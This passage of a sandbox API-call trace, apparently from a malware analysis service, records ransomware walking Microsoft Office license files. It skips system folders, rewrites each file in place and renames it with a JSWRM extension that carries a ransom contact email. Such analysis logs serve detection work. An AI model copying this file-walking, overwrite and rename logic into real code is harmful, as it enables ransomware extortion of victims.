0x23a270 [0108.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0108.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0108.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0108.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0108.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.967] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0108.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0108.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0108.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0108.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0108.968] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea0deb98, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea0deb98, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea20fde3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="PRBF75~1.XRM")) returned 1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.968] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0108.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2411f0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0108.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2413d0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0108.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0108.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.969] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11592) returned 1 [0108.969] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0108.969] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0108.972] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.972] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0108.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.972] CloseHandle (hObject=0x45c) returned 1 [0108.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0108.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0108.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0108.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0108.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0108.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0108.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.972] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0108.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0108.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0108.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0108.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0108.973] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9f3b180, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9f3b180, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea0deb98, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="PR029F~1.XRM")) returned 1 [0108.973] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0108.973] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0108.973] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0108.973] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0108.974] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0108.974] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0108.974] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0108.974] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.974] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0108.974] lstrcmpiW (lpString1="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0108.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0108.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0108.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0108.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0108.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0108.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0108.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.975] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19937) returned 1 [0108.975] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0108.975] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0108.977] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.977] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0108.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.978] CloseHandle (hObject=0x45c) returned 1 [0108.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0108.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0108.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0108.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0108.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0108.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.978] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0108.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0108.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0108.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0108.979] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea1774fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea1774fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea282534, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp2-pl.xrm-ms", cAlternateFileName="PR6FC7~1.XRM")) returned 1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2=".") returned 1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2="..") returned 1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2="...") returned 1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2="windows") returned -1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2="recovery") returned -1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.979] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-pl.xrm-ms", lpString2="msocache") returned 1 [0108.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0108.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241128, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0108.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0108.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0108.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0108.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.017] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0109.017] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0109.017] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0109.019] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.019] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0109.019] HeapFree (in: hHeap=0x1e0000, 